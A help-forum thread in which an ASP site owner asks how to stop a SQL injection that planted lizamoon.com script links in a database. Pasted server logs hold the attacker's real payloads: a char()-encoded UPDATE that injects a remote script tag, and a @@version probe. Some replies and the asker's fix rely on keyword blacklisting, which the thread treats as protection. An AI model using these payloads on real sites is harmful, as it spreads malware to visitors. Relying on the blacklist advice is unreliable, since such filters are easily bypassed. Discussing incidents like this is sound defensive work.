Link to home
Create AccountLog in
Avatar of garnett-dickinson
garnett-dickinson

asked on

Recent SQL Injection Attack

Hi,

Found out recently that my website (ASP and SQL Server database) has been attacked by SQL Injection. It has inserted a script link to lizamoon.com/ur.php into database fields that are either 'text' or 'nvarchar' fields.

Searching in google reveals that a lot of other ASP and ASP.NET have been hit as well.

I have now cleared out the database.

Has anyone got any suggestions of how to make sure this does not happen again or has anyone else had this exact attack happen to them and how and what have they done to prevent this.

Thanks in advance for you most greatful help.
Avatar of Aaron Shilo
Aaron Shilo
Flag of Israel image

Hello

This is a very common problem being faced by webmasters which are running websites coded long back. Major issue in these websites are that code, dosnt validate input from the user before passing it to the dataservers..

Solution is to use stored procedures instead of direct SQL statements. Or else, validate inputs before passing it to your quries.. avoid keywords like ";, select, update, insert, delete" etc from the user inputs.

These are the very basis pointers to start working on it.. If you are not a programmer, you will need to hire a programmer to handle this issue for you..

Let me know if i can help any further on this issue.

sounds like it is also 'cross site scripting', which you might also want to look into
ASKER CERTIFIED SOLUTION
Avatar of worthyking1
worthyking1
Flag of United States of America image

Link to home
membership
Create a free account to see this answer
Signing up is free and takes 30 seconds. No credit card required.
See answer
Avatar of garnett-dickinson
garnett-dickinson

ASKER

I have just noticed that it has happened again, not as many fields this time. I can't alter some of the scripts that I have on the site as they are part of an off-the-shelf shopping cart package that we've purchased. However, it has also affect tables in the database that are not part of the shopping cart package.

Want is even more strange is that it is the only database that has been affected on this SQL Server, 1 out of 4 databases. I have also change FTP and admin passwords since the first attack.

This is leading me to believe that this is not SQL injection, unless some people think otherwise.
I have just noticed (just after the second attack) the difference between the SQL Server database that was hit and the ones on the same server that were not, it was the permissions of the database. I had gott 'Delete', 'Execute', 'Insert', and 'Select' ticked. I have not got them ticked in my other database and I can still add, update, etc in my webpages.
I still believe it is SQL injection..

Will you like to share the URL to look into ?
Sorry, do you mean the URL of the site that got attacked
yes.. URl of the site which is attacked so that we can look into the security loop holes in it..
Hello,

Here are 4 very useful links from the OWASP :

http://www.owasp.org/index.php/SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

I use another strategy when programming ASP.NET applications, I use a data persistence framework such as Gentle Framework that completely protect against SQL injection, even if it is not the purpose at all of this kind of framework.
I have looked over the logs and found out which page they have used to inject the script code:

2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)

I have looked further into it and found a few entries using the highlight IP address, which I suspect is to find out which page they can use:

2011-02-11 08:26:05 <<my server ip>> GET /<<my page>>.asp prod=MG0011'+or+1=@@version--|11|80040e07|Conversion_failed_when_converting_the_nvarchar_value_'Microsoft_SQL_Server_2008_(RTM)_-_10.0.1600.22_(X64)__+Jul__9_2008_14:17:44__+Copyright_(c)_1988-2008_Microsoft_Corporation_+Web_Edition_(64-bit)_on_Windows_NT_5.2_<X64>_(Build_3790:_Service_Pack_2)_'_to_data_type_int. 80 - 95.64.9.18 HTTP/1.1

I have now put in a script which removes 'bad words' such as 'SELECT', 'INSERT', 'UPDATE', etc. from the query string passed to this page.

I'd rather not share the URL thanks